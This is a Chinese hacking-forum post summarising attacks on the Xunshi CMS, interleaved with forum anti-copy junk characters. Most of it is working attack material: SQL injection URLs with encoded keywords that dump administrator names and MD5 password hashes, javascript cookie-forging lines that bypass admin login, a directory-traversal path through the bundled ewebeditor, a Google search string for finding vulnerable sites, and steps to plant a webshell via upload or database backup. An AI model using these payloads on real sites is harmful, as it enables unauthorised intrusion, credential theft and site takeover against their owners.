中国网络渗透测试联盟

标题: 讯时漏洞总结 [打印本页]

作者: admin    时间: 2013-1-16 21:25
标题: 讯时漏洞总结
by:血封忆尘
: I. h. b7 e6 @
; ^6 W2 B0 e1 y; \3 s3 W6 {在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
& g4 Q, a7 c0 z( H" v2 m# N2 W
' r2 r# N4 [7 U以下本文总结来自黑防去年第9期杂志上的内容...0 Z+ N: H3 F* `( z0 v

6 Q: D' f% h) |先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%1 f0 ]1 v. t* q- ^$ }

# {1 W1 w& l3 j; u) F" ?26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 & I1 T) Q/ V' A

7 b$ I. v, f! l8 J0 ]( K记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况+ x% Q; V7 U8 _5 A! H. X6 |
这里一个注入
9 v8 F$ x: K( ~. G5 ?: H' i) J1 B2 v) l
效果如图:8 o3 g; w/ I, S1 n
# V$ P. n. f# h- O, q# d: X: Q& I
( F  c  X5 C7 {2 e$ j
4 f  `* W% X% x) q4 E
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.& Y; O# N" Z7 {" R
: }; ?9 Y# p  z3 d+ x. x. L
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
# D  x2 A' q5 S& m6 {6 B( \1 s, r( A- r/ o5 ?  D
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));1 K' _+ ^7 W' P+ W9 s

% ?# [+ K3 f2 A# T8 h% ?4 k5 z* c那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:3 f) C3 t- T  A- h6 s% }$ O

1 }6 j2 `  K0 L" W8 T因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞% L$ s+ O4 p% [3 }- k0 C! `* T' V) C! \
3 I5 l' G! Q, y
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以, b0 l" `  P  U2 }0 x4 M( i
* U' v& ?8 [( v2 K" {
访问这页面来列目录..步骤如下:
4 q: p9 I' z6 k/ r
+ z+ N+ B/ ]; A( y% C" p. F1 mjavascript:alert(document.cookie="admindj=1") # s: C( Z" Y  @' f9 }; P

" W, F( w& t8 Y) e4 M( A5 o& v9 y/ @1 Ahttp://www.political-security.co ... asp?id=46&dir=../..
; S, E$ o; G1 b: f& s9 [; L
. d% h: v( S" k; [( e效果如图:
# v' ?7 z0 U2 L- [+ z+ _/ O' m+ e7 _1 Y$ {6 s) B
; C0 ~7 g% P/ D' t1 w
. l! @3 D; {% T6 O
这样全站目录都能瞧了..找到后台目录..进去..
0 Z- k7 m+ e- Y) l6 S) T1 Y. p
! d/ K8 ^2 J6 y" a那么进了后台怎么拿shell??上传--备份就ok了..3 l1 K. }( a8 U- R

9 F" k6 \9 H' v/ m9 ?那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
- z, \. T1 i2 S1 R3 h9 l7 ?& w; u* a& x. X: y* O$ t+ w
这个我也碰到过一次..你都可以通过列目录来实现..% m" h* K8 P& N4 z) |$ M
/ q3 E" ^& x4 K4 z9 A
javascript:alert(document.cookie="admindj=1")
9 n/ A6 Q, g6 ?  ~; ]
3 Q; L7 [2 [0 B" y: ?http://www.political-security.co ... p?action=BackupData & b6 l  _# Z/ Y7 |

7 ^* [/ K. s" O. h5 `+ J" [备份ok..
; Q0 I/ ~/ ]. w* G" q$ D; ~# h+ W
1 s1 i: n9 D& W( D7 H( g那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
4 B0 {5 ?) y+ e  z
1 t' z/ ?" {* e& F5 c( P) y. j8 `& f5 \在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
" X2 p. v# P5 j
6 W  i% i& ~6 A4 S- O: k& t然后访问此页面进行注入..步骤如下:
7 `& E! ^3 R4 E0 b5 d3 j9 l( ^9 A: [0 S" k8 J
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")2 Z/ b( I. ]/ l& F/ q
3 y( t, J0 `5 e. t: h  @% @3 o
然后请求admin/admin_chk.asp页面
; l" U+ z: r: g# T2 R$ I  A9 j/ M% q0 K' ~+ b& [5 T3 a& a
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%$ W  `/ G6 Z' q3 P$ [- d
$ o( Z! j- W* [% a6 X
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
7 X! @+ A# U  g; Q- Q" N& A% T# t) M' Q3 A* ^% ?
效果如图所示:
% _. f. f3 X" P" b, h$ N. l. I, |" O; V5 \; `0 X: z& r8 J* g: q1 `

+ t! R- B9 F( ~# l1 ?4 ?7 D6 k- R: {
讯时漏洞2/ S' ?# x- B9 K+ N" G  h) v
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)8 r- m3 j+ ]# I3 M3 K1 U
5 a- c4 p6 \2 A
1、/admin/admin_news_pl_view.asp?id=1
: a! A& S; O, f  H+ c, v& W//id任意 填入以下语句
2 M2 [8 l4 q& I) N  n ; W; O0 w3 S& ^$ q/ `2 w
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
' q7 ]" \3 _) C- f/ c * F2 H' a- C! o; A3 q; O
/ i. L! E6 K; n4 F1 C/ B4 ]7 l; i- ^

4 T! g2 Q8 X4 t! U9 a1 {, A' ?3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
& F; H, C9 z% D9 Z# Z ; C, q/ w' t1 a( a: I

5 b$ A8 |6 S8 n- T' A# C% O8 z! m
$ A5 Q5 y' E: [: _! k爆出管理员帐号和密码了) |3 O- w7 X0 Q+ t: i8 Q

, g7 }! R% U3 E9 B! X' T& U. E- d& O: C0 ]7 p

0 j( M5 O) v8 R, H4、cookies进后台
9 T- t" e9 L' V" t 2 [8 c5 b, J8 R
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));/ J& Y$ L! B$ k, b+ x* z' k9 m5 u
' u: r6 U9 v/ n; D, N
- d1 a! P! d7 K' r) s, b

. g2 K1 t$ F( D3 N3 J  V6 x5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!) ]# l/ `# c+ ^5 S4 F* P: ~8 D

9 U  b4 g, s  ?  R3 X
  r* Z8 g. J8 a. p1 R6 U( g0 E2 f5 T; x1 C& O0 d
6、后台有上传和备份取SHELL不难。9 k" U; r6 |. j; l% \' w
- [, j. a- N5 `$ L# t5 U8 G; t
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..# l) L3 X7 a6 h6 i4 R

/ ]7 ?2 Z3 o. B; X- G# ]+ {逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!- ^' H: J0 N4 C* K( a# [* \

2 U. S) n/ U+ I) E/ A9 ?3 v
+ v+ _* @+ y1 N; f) I" y
+ |4 @( e( @2 q4 q. l4 f7 D# @. y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2